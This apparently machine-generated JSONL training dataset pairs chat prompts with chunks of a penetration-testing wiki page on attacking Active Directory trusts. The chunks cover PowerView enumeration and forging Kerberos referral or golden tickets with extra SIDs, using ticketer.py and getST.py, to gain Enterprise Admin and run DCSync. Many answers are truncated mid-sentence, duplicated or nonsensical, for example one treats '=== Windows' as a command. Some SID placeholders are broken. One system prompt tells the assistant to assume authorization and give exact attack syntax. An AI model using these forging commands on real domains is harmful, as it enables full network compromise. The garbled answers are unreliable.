it. This data is replicated among all domain controllers marked as global catalogs for the forest. Trusted domain objects are replicated in the gl"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Trusts - PowerView work?", "response": "Alternatively, PowerSploit's PowerView (PowerShell) supports multiple commands for various purposes.\n\n| Command | Alias | Description |\n| --------------------------------------------------------- | ------------------------------------------------------------ | ------------------------------------------------------------------------------------------------------ |\n| Get-DomainTrust | Get-NetDomainTrust | gets all trusts for the current user's domain |\n| Get-ForestTrust | Get-NetForestTrust | gets all trusts for the forest associated with the current user's domain |\n| Get-DomainForeignUser | Find-ForeignUser | enumerates users who are in groups outside of their principal domain |\n| Get-DomainForeignGroupMember | Find-ForeignGroup | enumerates all the members of a domain's groups and finds users that are outside of the queried domain |\n| Get-DomainTrustMapping | Invoke-MapDomainTrust | try to build a relational mapping of all domain trusts |\n> The global catalog is a partial copy of all objects.aspx) in an Active Directory forest, meaning that some object properties (but not all) are contained within it. This data is replicated among all domain controllers marked as global catalogs for the forest. Trusted domain objects are replicated in the gl", "metadata": {"corpus_index": 1140, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Trusts - PowerView"}, {"role": "assistant", "content": "Alternatively, PowerSploit's PowerView (PowerShell) supports multiple commands for various purposes.\n\n| Command | Alias | Description |\n| --------------------------------------------------------- | ------------------------------------------------------------ | ------------------------------------------------------------------------------------------------------ |\n| Get-DomainTrust | Get-NetDomainTrust | gets all trusts for the current user's domain |\n| Get-ForestTrust | Get-NetForestTrust | gets all trusts for the forest associated with the current user's domain |\n| Get-DomainForeignUser | Find-ForeignUser | enumerates users who are in groups outside of their principal domain |\n| Get-DomainForeignGroupMember | Find-ForeignGroup | enumerates all the members of a domain's groups and finds users that are outside of the queried domain |\n| Get-DomainTrustMapping | Invoke-MapDomainTrust | try to build a relational mapping of all domain trusts |\n> The global catalog is a partial copy of all objects.aspx) in an Active Directory forest, meaning that some object properties (but not all) are contained within it. This data is replicated among all domain controllers marked as global catalogs for the forest. Trusted domain objects are replicated in the gl"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Trusts - PowerView", "response": "Alternatively, PowerSploit's PowerView (PowerShell) supports multiple commands for various purposes.\n\n| Command | Alias | Description |\n| --------------------------------------------------------- | ------------------------------------------------------------ | ------------------------------------------------------------------------------------------------------ |\n| Get-DomainTrust | Get-NetDomainTrust | gets all trusts for the current user's domain |\n| Get-ForestTrust | Get-NetForestTrust | gets all trusts for the forest associated with the current user's domain |\n| Get-DomainForeignUser | Find-ForeignUser | enumerates users who are in groups outside of their principal domain |\n| Get-DomainForeignGroupMember | Find-ForeignGroup | enumerates all the members of a domain's groups and finds users that are outside of the queried domain |\n| Get-DomainTrustMapping | Invoke-MapDomainTrust | try to build a relational mapping of all domain trusts |\n> The global catalog is a partial copy of all objects.aspx) in an Active Directory forest, meaning that some object properties (but not all) are contained within it. This data is replicated among all domain controllers marked as global catalogs for the forest. Trusted domain objects are replicated in the gl", "metadata": {"corpus_index": 1140, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the Get-DomainTrust syntax for trusts - powerview?"}, {"role": "assistant", "content": "Get-DomainTrust -SearchBase \"GC://$($ENV:USERDNSDOMAIN)\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the Get-DomainTrust syntax for trusts - powerview?", "response": "Get-DomainTrust -SearchBase \"GC://$($ENV:USERDNSDOMAIN)\"", "metadata": {"corpus_index": 1141, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Get-DomainTrust"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Trusts - PowerView"}, {"role": "assistant", "content": "Get-DomainTrust -SearchBase \"GC://$($ENV:USERDNSDOMAIN)\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Trusts - PowerView", "response": "Get-DomainTrust -SearchBase \"GC://$($ENV:USERDNSDOMAIN)\"", "metadata": {"corpus_index": 1141, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Get-DomainTrust -SearchBase \"GC://$($ENV:USERDNSDOMAIN)\"`?"}, {"role": "assistant", "content": "This command is used for trusts - powerview. PowerView"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Get-DomainTrust -SearchBase \"GC://$($ENV:USERDNSDOMAIN)\"`?", "response": "This command is used for trusts - powerview. PowerView", "metadata": {"corpus_index": 1141, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Trusts - BloodHound"}, {"role": "assistant", "content": "BloodHound can also be used to map the trusts. While it doesn't provide much details, it shows a visual representation.\n\n:::\n\nIn addition to enumerating trusts, retrieving information about the permissions of trusted principals against trusting resources could also allow for lateral movement and privilege escalation. The recon techniques will depend on the permissions to abuse (DACL, Kerberos delegations, etc.).\n\nA forest is probably managed by a Bastion Forest when the TRUST_ATTRIBUTE_PIM_TRUST (0x400) flag is set in the trust attributes.\n\nTo enumerate the Shadow Security Principals, and LDAP query can be made to list the Name, member, and msDS-ShadowPrincipalSid attributes of Shadow Principals in the CN=Shadow Principal Configuration,CN=Services,{CONFIGURATION_NAMING_CONTEXT} container.\n\n* name: name of the shadow principal\n* member: principals (from the Bastion Forest) mapped to it\n* msDS-ShadowPrincipalSid: the SID of the principal (from the Production Forest) whose privileges are assigned to the shadow security principal.\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Trusts - BloodHound", "response": "BloodHound can also be used to map the trusts. While it doesn't provide much details, it shows a visual representation.\n\n:::\n\nIn addition to enumerating trusts, retrieving information about the permissions of trusted principals against trusting resources could also allow for lateral movement and privilege escalation. The recon techniques will depend on the permissions to abuse (DACL, Kerberos delegations, etc.).\n\nA forest is probably managed by a Bastion Forest when the TRUST_ATTRIBUTE_PIM_TRUST (0x400) flag is set in the trust attributes.\n\nTo enumerate the Shadow Security Principals, and LDAP query can be made to list the Name, member, and msDS-ShadowPrincipalSid attributes of Shadow Principals in the CN=Shadow Principal Configuration,CN=Services,{CONFIGURATION_NAMING_CONTEXT} container.\n\n* name: name of the shadow principal\n* member: principals (from the Bastion Forest) mapped to it\n* msDS-ShadowPrincipalSid: the SID of the principal (from the Production Forest) whose privileges are assigned to the shadow security principal.\n:::", "metadata": {"corpus_index": 1142, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Trusts - BloodHound during a pentest?"}, {"role": "assistant", "content": "BloodHound can also be used to map the trusts. While it doesn't provide much details, it shows a visual representation.\n\n:::\n\nIn addition to enumerating trusts, retrieving information about the permissions of trusted principals against trusting resources could also allow for lateral movement and privilege escalation. The recon techniques will depend on the permissions to abuse (DACL, Kerberos delegations, etc.).\n\nA forest is probably managed by a Bastion Forest when the TRUST_ATTRIBUTE_PIM_TRUST (0x400) flag is set in the trust attributes.\n\nTo enumerate the Shadow Security Principals, and LDAP query can be made to list the Name, member, and msDS-ShadowPrincipalSid attributes of Shadow Principals in the CN=Shadow Principal Configuration,CN=Services,{CONFIGURATION_NAMING_CONTEXT} container.\n\n* name: name of the shadow principal\n* member: principals (from the Bastion Forest) mapped to it\n* msDS-ShadowPrincipalSid: the SID of the principal (from the Production Forest) whose privileges are assigned to the shadow security principal.\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Trusts - BloodHound during a pentest?", "response": "BloodHound can also be used to map the trusts. While it doesn't provide much details, it shows a visual representation.\n\n:::\n\nIn addition to enumerating trusts, retrieving information about the permissions of trusted principals against trusting resources could also allow for lateral movement and privilege escalation. The recon techniques will depend on the permissions to abuse (DACL, Kerberos delegations, etc.).\n\nA forest is probably managed by a Bastion Forest when the TRUST_ATTRIBUTE_PIM_TRUST (0x400) flag is set in the trust attributes.\n\nTo enumerate the Shadow Security Principals, and LDAP query can be made to list the Name, member, and msDS-ShadowPrincipalSid attributes of Shadow Principals in the CN=Shadow Principal Configuration,CN=Services,{CONFIGURATION_NAMING_CONTEXT} container.\n\n* name: name of the shadow principal\n* member: principals (from the Bastion Forest) mapped to it\n* msDS-ShadowPrincipalSid: the SID of the principal (from the Production Forest) whose privileges are assigned to the shadow security principal.\n:::", "metadata": {"corpus_index": 1142, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Trusts - Forging tickets"}, {"role": "assistant", "content": "When authenticating across trusts, an attacker can forge either:\n\n1. A referral ticket (inter-realm TGT) using the inter-realm trust key\n2. A golden ticket using the compromised domain's krbtgt hash\n\nIn both cases, additional security identifiers (SIDs) can be added as \"extra SID\" to be considered as part of the user's SID history when authenticating. Alternatively, the SID could be added beforehand, directly in the SID history attribute, with mimikatz sid:add command, but that's a topic for another day.\n\n> [!IMPORTANT]\n> When forging tickets, before November 2021 updates, the username supplied was mostly useless. As of Nov. 2021 updates, if the username supplied doesn't exist in Active Directory, the ticket gets rejected. This applies to both referral tickets and golden tickets.\n\nThen, when using the ticket, the SID history would be taken into account and could grant elevated privileges (depending on how SID filtering is configured in the trust):\n\n* If the attacker is moving across an intra-forest trust, it would allow to compromise the forest root, and by extension, all the forest, since Enterprise Admins can access all domains' domain controllers as admin (because the security boundary is the forest, not the domain).\n* If the attacker is moving across an inter-forest trust, it could allow to compromise the trusting domain, depending on how SID filtering is configured, and if there are some groups that have sufficient permissions.\n\nIn conclusion, before attacking trusts, it's required to enumerate them, as well as enumerate the target (trusting) domain's resources. See enumeration.\n\n* If SID filtering is disabled in the targeted trust relationship (see SID filtering and Enumeration), a ticket (referral ticket, or golden ticket) can be forged with an extra SID that contains the root domain and the RID of the \"Enterprise Admins\" group (i.e. S-1-5-21--519). The ticket can then be used to access the trusting domain controller as admin and conduct a DCSync attack.\n* If"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Trusts - Forging tickets", "response": "When authenticating across trusts, an attacker can forge either:\n\n1. A referral ticket (inter-realm TGT) using the inter-realm trust key\n2. A golden ticket using the compromised domain's krbtgt hash\n\nIn both cases, additional security identifiers (SIDs) can be added as \"extra SID\" to be considered as part of the user's SID history when authenticating. Alternatively, the SID could be added beforehand, directly in the SID history attribute, with mimikatz sid:add command, but that's a topic for another day.\n\n> [!IMPORTANT]\n> When forging tickets, before November 2021 updates, the username supplied was mostly useless. As of Nov. 2021 updates, if the username supplied doesn't exist in Active Directory, the ticket gets rejected. This applies to both referral tickets and golden tickets.\n\nThen, when using the ticket, the SID history would be taken into account and could grant elevated privileges (depending on how SID filtering is configured in the trust):\n\n* If the attacker is moving across an intra-forest trust, it would allow to compromise the forest root, and by extension, all the forest, since Enterprise Admins can access all domains' domain controllers as admin (because the security boundary is the forest, not the domain).\n* If the attacker is moving across an inter-forest trust, it could allow to compromise the trusting domain, depending on how SID filtering is configured, and if there are some groups that have sufficient permissions.\n\nIn conclusion, before attacking trusts, it's required to enumerate them, as well as enumerate the target (trusting) domain's resources. See enumeration.\n\n* If SID filtering is disabled in the targeted trust relationship (see SID filtering and Enumeration), a ticket (referral ticket, or golden ticket) can be forged with an extra SID that contains the root domain and the RID of the \"Enterprise Admins\" group (i.e. S-1-5-21--519). The ticket can then be used to access the trusting domain controller as admin and conduct a DCSync attack.\n* If", "metadata": {"corpus_index": 1143, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Trusts - Forging tickets during a pentest?"}, {"role": "assistant", "content": "When authenticating across trusts, an attacker can forge either:\n\n1. A referral ticket (inter-realm TGT) using the inter-realm trust key\n2. A golden ticket using the compromised domain's krbtgt hash\n\nIn both cases, additional security identifiers (SIDs) can be added as \"extra SID\" to be considered as part of the user's SID history when authenticating. Alternatively, the SID could be added beforehand, directly in the SID history attribute, with mimikatz sid:add command, but that's a topic for another day.\n\n> [!IMPORTANT]\n> When forging tickets, before November 2021 updates, the username supplied was mostly useless. As of Nov. 2021 updates, if the username supplied doesn't exist in Active Directory, the ticket gets rejected. This applies to both referral tickets and golden tickets.\n\nThen, when using the ticket, the SID history would be taken into account and could grant elevated privileges (depending on how SID filtering is configured in the trust):\n\n* If the attacker is moving across an intra-forest trust, it would allow to compromise the forest root, and by extension, all the forest, since Enterprise Admins can access all domains' domain controllers as admin (because the security boundary is the forest, not the domain).\n* If the attacker is moving across an inter-forest trust, it could allow to compromise the trusting domain, depending on how SID filtering is configured, and if there are some groups that have sufficient permissions.\n\nIn conclusion, before attacking trusts, it's required to enumerate them, as well as enumerate the target (trusting) domain's resources. See enumeration.\n\n* If SID filtering is disabled in the targeted trust relationship (see SID filtering and Enumeration), a ticket (referral ticket, or golden ticket) can be forged with an extra SID that contains the root domain and the RID of the \"Enterprise Admins\" group (i.e. S-1-5-21--519). The ticket can then be used to access the trusting domain controller as admin and conduct a DCSync attack.\n* If"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Trusts - Forging tickets during a pentest?", "response": "When authenticating across trusts, an attacker can forge either:\n\n1. A referral ticket (inter-realm TGT) using the inter-realm trust key\n2. A golden ticket using the compromised domain's krbtgt hash\n\nIn both cases, additional security identifiers (SIDs) can be added as \"extra SID\" to be considered as part of the user's SID history when authenticating. Alternatively, the SID could be added beforehand, directly in the SID history attribute, with mimikatz sid:add command, but that's a topic for another day.\n\n> [!IMPORTANT]\n> When forging tickets, before November 2021 updates, the username supplied was mostly useless. As of Nov. 2021 updates, if the username supplied doesn't exist in Active Directory, the ticket gets rejected. This applies to both referral tickets and golden tickets.\n\nThen, when using the ticket, the SID history would be taken into account and could grant elevated privileges (depending on how SID filtering is configured in the trust):\n\n* If the attacker is moving across an intra-forest trust, it would allow to compromise the forest root, and by extension, all the forest, since Enterprise Admins can access all domains' domain controllers as admin (because the security boundary is the forest, not the domain).\n* If the attacker is moving across an inter-forest trust, it could allow to compromise the trusting domain, depending on how SID filtering is configured, and if there are some groups that have sufficient permissions.\n\nIn conclusion, before attacking trusts, it's required to enumerate them, as well as enumerate the target (trusting) domain's resources. See enumeration.\n\n* If SID filtering is disabled in the targeted trust relationship (see SID filtering and Enumeration), a ticket (referral ticket, or golden ticket) can be forged with an extra SID that contains the root domain and the RID of the \"Enterprise Admins\" group (i.e. S-1-5-21--519). The ticket can then be used to access the trusting domain controller as admin and conduct a DCSync attack.\n* If", "metadata": {"corpus_index": 1143, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Trusts - Referral ticket work?"}, {"role": "assistant", "content": "When forging a referral ticket, a service ticket request must be conducted before trying to access the domain controller. The referral ticket is encrypted with the inter-realm key shared between the two domains.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket scripts (Python) can be used:\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Trusts - Referral ticket work?", "response": "When forging a referral ticket, a service ticket request must be conducted before trying to access the domain controller. The referral ticket is encrypted with the inter-realm key shared between the two domains.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket scripts (Python) can be used:\n\n```bash", "metadata": {"corpus_index": 1144, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Trusts - Referral ticket?"}, {"role": "assistant", "content": "When forging a referral ticket, a service ticket request must be conducted before trying to access the domain controller. The referral ticket is encrypted with the inter-realm key shared between the two domains.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket scripts (Python) can be used:\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Trusts - Referral ticket?", "response": "When forging a referral ticket, a service ticket request must be conducted before trying to access the domain controller. The referral ticket is encrypted with the inter-realm key shared between the two domains.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket scripts (Python) can be used:\n\n```bash", "metadata": {"corpus_index": 1144, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 1. forge the referral ticket"}, {"role": "assistant", "content": "ticketer.py -nthash \"inter-realm key\" -domain-sid \"compromised_domain_SID\" -domain \"compromised_domain_FQDN\" -extra-sid \"-\" -spn \"krbtgt/target_domain_fqdn\" \"someusername\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 1. forge the referral ticket", "response": "ticketer.py -nthash \"inter-realm key\" -domain-sid \"compromised_domain_SID\" -domain \"compromised_domain_FQDN\" -extra-sid \"-\" -spn \"krbtgt/target_domain_fqdn\" \"someusername\"", "metadata": {"corpus_index": 1145, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 1. forge the referral ticket"}, {"role": "assistant", "content": "ticketer.py -nthash \"inter-realm key\" -domain-sid \"compromised_domain_SID\" -domain \"compromised_domain_FQDN\" -extra-sid \"-\" -spn \"krbtgt/target_domain_fqdn\" \"someusername\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 1. forge the referral ticket", "response": "ticketer.py -nthash \"inter-realm key\" -domain-sid \"compromised_domain_SID\" -domain \"compromised_domain_FQDN\" -extra-sid \"-\" -spn \"krbtgt/target_domain_fqdn\" \"someusername\"", "metadata": {"corpus_index": 1145, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 2. use it to request a service ticket work?"}, {"role": "assistant", "content": "KRB5CCNAME=\"someusername.ccache\" getST.py -k -no-pass -debug -spn \"CIFS/domain_controller\" \"target_domain_fqdn/someusername@target_domain_fqdn\"\n``\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used:\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 2. use it to request a service ticket work?", "response": "KRB5CCNAME=\"someusername.ccache\" getST.py -k -no-pass -debug -spn \"CIFS/domain_controller\" \"target_domain_fqdn/someusername@target_domain_fqdn\"\n``\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used:\n\n``powershell", "metadata": {"corpus_index": 1146, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 2. use it to request a service ticket?"}, {"role": "assistant", "content": "KRB5CCNAME=\"someusername.ccache\" getST.py -k -no-pass -debug -spn \"CIFS/domain_controller\" \"target_domain_fqdn/someusername@target_domain_fqdn\"\n``\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used:\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 2. use it to request a service ticket?", "response": "KRB5CCNAME=\"someusername.ccache\" getST.py -k -no-pass -debug -spn \"CIFS/domain_controller\" \"target_domain_fqdn/someusername@target_domain_fqdn\"\n``\n\n=== Windows\n\nFrom Windows machines, Rubeus (C#) can be used:\n\n``powershell", "metadata": {"corpus_index": 1146, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 2. use it to request a service ticket during a pentest?"}, {"role": "assistant", "content": "=== Windows\n\nFrom Windows machines, [Rubeus](https://github.com/GhostPack/Rubeus) (C#) can be used:"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 2. use it to request a service ticket during a pentest?", "response": "=== Windows\n\nFrom Windows machines, [Rubeus](https://github.com/GhostPack/Rubeus) (C#) can be used:", "metadata": {"corpus_index": 1147, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for 2. use it to request a service ticket. 2. use it to request a service ticket"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for 2. use it to request a service ticket. 2. use it to request a service ticket", "metadata": {"corpus_index": 1147, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Trusts - Golden ticket in the context of penetration testing"}, {"role": "assistant", "content": "When forging a golden ticket, the target domain controller will handle the service ticket generation itself. The golden ticket is encrypted with the compromised domain's krbtgt hash.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket scripts (Python) can be used:\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Trusts - Golden ticket in the context of penetration testing", "response": "When forging a golden ticket, the target domain controller will handle the service ticket generation itself. The golden ticket is encrypted with the compromised domain's krbtgt hash.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket scripts (Python) can be used:\n\n```bash", "metadata": {"corpus_index": 1148, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Trusts - Golden ticket"}, {"role": "assistant", "content": "When forging a golden ticket, the target domain controller will handle the service ticket generation itself. The golden ticket is encrypted with the compromised domain's krbtgt hash.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket scripts (Python) can be used:\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Trusts - Golden ticket", "response": "When forging a golden ticket, the target domain controller will handle the service ticket generation itself. The golden ticket is encrypted with the compromised domain's krbtgt hash.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket scripts (Python) can be used:\n\n```bash", "metadata": {"corpus_index": 1148, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Generate golden ticket with extra SID in the context of penetration testing"}, {"role": "assistant", "content": "ticketer.py -nthash \"compromised_domain_krbtgt_NT_hash\" -domain-sid \"compromised_domain_SID\" -domain \"compromised_domain_FQDN\" -extra-sid \"-\" \"someusername\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Generate golden ticket with extra SID in the context of penetration testing", "response": "ticketer.py -nthash \"compromised_domain_krbtgt_NT_hash\" -domain-sid \"compromised_domain_SID\" -domain \"compromised_domain_FQDN\" -extra-sid \"-\" \"someusername\"", "metadata": {"corpus_index": 1149, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Generate golden ticket with extra SID?"}, {"role": "assistant", "content": "ticketer.py -nthash \"compromised_domain_krbtgt_NT_hash\" -domain-sid \"compromised_domain_SID\" -domain \"compromised_domain_FQDN\" -extra-sid \"-\" \"someusername\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions 